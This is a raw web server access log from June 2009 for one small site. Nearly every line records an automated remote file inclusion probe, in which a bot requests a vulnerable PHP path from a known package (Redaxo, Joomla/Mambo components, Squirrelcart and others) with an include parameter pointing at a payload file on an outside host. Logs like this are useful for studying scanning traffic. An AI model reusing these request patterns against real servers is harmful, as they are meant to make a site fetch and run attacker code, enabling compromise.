121.130.29.11 - - [21/Jun/2009:11:27:19 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:27:19 -0700] "GET /logs/access_080603.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:27:20 -0700] "GET /logs/access_080503.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:27:20 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:27:20 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:27:20 -0700] "GET /logs/access_080603.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:27:21 -0700] "GET /logs/access_080501.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:27:21 -0700] "GET /logs/access_080211.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:27:23 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:27:23 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:27:23 -0700] "GET /logs/access_080603.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:27:26 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:27:26 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:27:27 -0700] "GET /logs/access_080603.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:27:35 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:27:35 -0700] "GET /logs/access_080603.log%20%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:27:35 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:27:40 -0700] "GET /logs/access_090519.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.30.100.97 - - [21/Jun/2009:11:27:43 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.30.100.97 - - [21/Jun/2009:11:27:43 -0700] "GET /logs/access_080603.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.30.100.97 - - [21/Jun/2009:11:27:44 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:11:27:45 -0700] "GET /logs/access_080514.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:27:45 -0700] "GET /logs/access_090519.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:27:47 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:27:47 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:27:47 -0700] "GET /logs/access_080603.log%20%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:27:48 -0700] "GET /logs/access_080503.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:27:54 -0700] "GET /logs/access_090519.log%20%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:28:01 -0700] "GET /logs/access_090519.log%20%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.30.100.97 - - [21/Jun/2009:11:28:14 -0700] "GET /logs/access_080603.log%20%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.30.100.97 - - [21/Jun/2009:11:28:14 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.30.100.97 - - [21/Jun/2009:11:28:14 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.30.100.97 - - [21/Jun/2009:11:28:23 -0700] "GET /logs/access_090519.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:28:53 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:28:53 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:28:53 -0700] "GET /logs/access_080214.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:28:59 -0700] "GET /logs/access_080616.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.30.100.97 - - [21/Jun/2009:11:29:16 -0700] "GET /logs/access_090519.log%20%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:29:29 -0700] "GET /logs/access_080314.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:29:29 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:29:31 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:29:31 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:29:39 -0700] "GET /logs/access_080906.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:29:41 -0700] "GET /logs/access_081021.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.67.172 - - [21/Jun/2009:11:29:43 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:29:43 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:29:43 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:29:43 -0700] "GET /logs/access_080214.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.67.172 - - [21/Jun/2009:11:29:44 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.172 - - [21/Jun/2009:11:29:44 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:29:45 -0700] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20912 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:11:29:50 -0700] "GET /logs/access_080616.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.207.155 - - [21/Jun/2009:11:31:14 -0700] "GET /bikes/occcb/eBayISAPI.dll.htm HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2)" "www.dmulk.com"
66.77.136.153 - - [21/Jun/2009:11:31:14 -0700] "GET /bikes/occcb/eBayISAPI.dll.htm HTTP/1.0" 404 275 "-" "Mozilla/3.0 [en] (compatible; Win98; U)" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:31:36 -0700] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:31:37 -0700] "GET /logs/access_080627.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:31:57 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:31:58 -0700] "GET /logs/access_080627.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:31:58 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:32:02 -0700] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:32:10 -0700] "GET /logs/access_080503.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:32:10 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:32:11 -0700] "GET /logs/access_080627.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:32:11 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:32:15 -0700] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20912 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:32:20 -0700] "GET /logs/access_081021.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:32:26 -0700] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20912 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:32:44 -0700] "GET /logs/access_080817.log//plugins/safehtml/safehtml.php?dir[plugins]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:32:45 -0700] "GET /logs/access_080807.log//plugins/safehtml/safehtml.php?dir[plugins]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:11:33:13 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:33:44 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:33:44 -0700] "GET /logs/access_080214.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:33:44 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:33:50 -0700] "GET /logs/access_080616.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:34:50 -0700] "GET /logs/access_081021.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.89.139 - - [21/Jun/2009:11:35:18 -0700] "GET /logs/access_081123.log%20%20//?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.89.139 - - [21/Jun/2009:11:35:18 -0700] "GET /logs//?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 105055 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:35:20 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:35:28 -0700] "GET /logs/access_080503.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:35:28 -0700] "GET /logs/access_080627.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.89.139 - - [21/Jun/2009:11:35:30 -0700] "GET /logs/access_081009.log%20%20//?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.89.139 - - [21/Jun/2009:11:35:34 -0700] "GET /?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 21013 "-" "Mozilla/5.0" "www.dmulk.com"
218.30.100.97 - - [21/Jun/2009:11:35:52 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.30.100.97 - - [21/Jun/2009:11:35:52 -0700] "GET /logs/access_080214.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.30.100.97 - - [21/Jun/2009:11:35:52 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.30.100.97 - - [21/Jun/2009:11:36:18 -0700] "GET /logs/access_080616.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:36:58 -0700] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:36:58 -0700] "GET /logs/access_080627.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:37:15 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:37:15 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:37:18 -0700] "GET /logs/access_070917.log%20%20/index.php?p=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:37:18 -0700] "GET /logs/index.php?p=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:37:29 -0700] "GET /index.php?p=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 200 20854 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:11:37:35 -0700] "GET /logs/access_080503.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:37:46 -0700] "GET /logs/access_090507.log%20%20//common/db.php?commonpath=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:37:46 -0700] "GET /logs//common/db.php?commonpath=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:37:46 -0700] "GET /common/db.php?commonpath=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:37:47 -0700] "GET /common/db.php?commonpath=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:37:47 -0700] "GET /logs//common/db.php?commonpath=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:37:47 -0700] "GET /logs/access_090507.log//common/db.php?commonpath=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:37:54 -0700] "GET /logs/index.php?p=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:37:54 -0700] "GET /logs/access_070917.log%20%20/index.php?p=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:37:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:11:38:00 -0700] "GET /logs/access_080410.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:38:06 -0700] "GET /logs/access_090507.log//common/db.php?commonpath=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:38:06 -0700] "GET /logs//common/db.php?commonpath=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:38:06 -0700] "GET /common/db.php?commonpath=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:38:08 -0700] "GET /index.php?p=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 200 20854 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:38:11 -0700] "GET /logs/access_081026.log//common/db.php?commonpath=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:38:30 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:38:30 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:38:31 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:38:39 -0700] "GET /logs/access_081026.log%20%20//common/db.php?commonpath=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.67.172 - - [21/Jun/2009:11:38:44 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:38:45 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20912 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:38:45 -0700] "GET /logs/access_081026.log//common/db.php?commonpath=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:38:48 -0700] "GET /logs/access_080314.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:39:23 -0700] "GET /logs/access_080630.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
